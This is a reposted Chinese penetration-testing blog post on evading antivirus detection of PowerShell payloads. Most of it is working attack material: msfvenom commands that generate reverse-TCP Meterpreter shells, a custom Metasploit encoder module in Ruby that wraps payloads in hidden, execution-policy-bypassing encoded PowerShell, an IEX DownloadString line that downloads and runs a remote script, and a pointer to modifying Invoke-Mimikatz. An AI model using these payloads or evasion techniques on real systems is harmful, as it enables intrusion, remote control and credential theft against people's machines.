转载文章:https://www.cnblogs.com/backlion/p/8986816.html
知识点介绍:
Windows PowerShell
是以.NET Framework
技术为基础,并且与现有的WSH
保持向后兼容,因此它的脚本程序不仅能访问.NET CLR
,也能使用现有的COM
技术。同时也包含了数种系统管理工具、简易且一致的语法, 提升管理者处理,常见如登录数据库、WMl
。Exchange Server 2007
以及System Center Operations Manager 2007
等服务器软件都将内置Windows PowerShell
。Windows PowerShell
的强大,并且内置,在渗透过程中,也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell
的一切切行为。- 官方文档:
https://docs.microsoft.com/zh-cn/powershell/
本地测试
Add-Type -AssemblyName PresentationFramework;
[System.windows.MessageBox]::show('Micropoor')
上文所说,越来越多的杀软开始对抗,powershell
的部分行为,或者特征。以msfvenom
为例,生成payload
。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.137 lport=4444 -f psh-reflection >xxx.ps1
直接被杀
针对powershell
特性,更改payload
接下来考虑的事情是如何把以上重复的工作变成自动化,并且针对powershell
, DownloadString
特性,设计出2种payload
形式:
- 目标机出网
- 目标机不出网
并且根据需求,无缝连接Metasploit
。
根据微软文档,可以找到可能对以上有帮助的属性,分别为:
- WindowStyle
- NoExit
- EncodedCommand
- exec
自动化实现如下:
# copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.
# E.g
# msf encoder(powershell/base64) > use exploit/multi/handler
# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# payload => windows/x64/meterpreter/reverse_tcp
# msf exploit(multi/handler) > exploit
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
# [*] Started reverse TCP handler on xx.1xx.xx.xx:xx
class MetasploitModule < Msf::Encoder
Rank = NormalRanking
def initialize
super(
'Name' => 'Powershell Base64 Encoder',
'Description' => %q{
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
},
'Author' => 'Micropoor',
'Arch' => ARCH_CMD,
'Platform' => 'win')
register_options([
OptBool.new('payload', [ false, 'Use payload ', false ]),
OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])
])
end
def encode_block(state, buf)
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))
cmd = ''
if datastore['x64']
cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
else
cmd += 'powershell.exe '
end
if datastore['payload']
cmd += '-windowstyle hidden -exec bypass -NoExit '
end
cmd += "-EncodedCommand #{base64}"
end
end
# if use caidao
# execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows
# xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
拷贝powershell_base64.rb
文件到 /usr/share/metasploit-framework/modules/encoders/powershell
目录下 如果powershell
空,请新建powershell
目录
参数 payload
选择是否使用Metasploit payload
,来去掉powershell
的关键字。
例1(目标出网,下载执行):
powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.137:8080/micropoor.ps1');\"" |msfvenom -e powershell/powershellbase64 --arch x64 --platform windows
例2(目标不出网,本地执行)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.137 LPORT=4444 -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/powershell_base64 --arch x64 --platform windows payload
注:加payload
参数
更多有趣的实验:
把例1的down
内容更改为例2,并且去掉payload
参数。来减小payload
大小。
更改Invoke-Mimikatz.ps1
等。
from: https://technet.microsoft.com/en-us/library/ff629472.aspx
https://github.com/danielbohannon/Invoke-Obfuscation
https://micropoor.blogspot.com/2018/04/powershell.html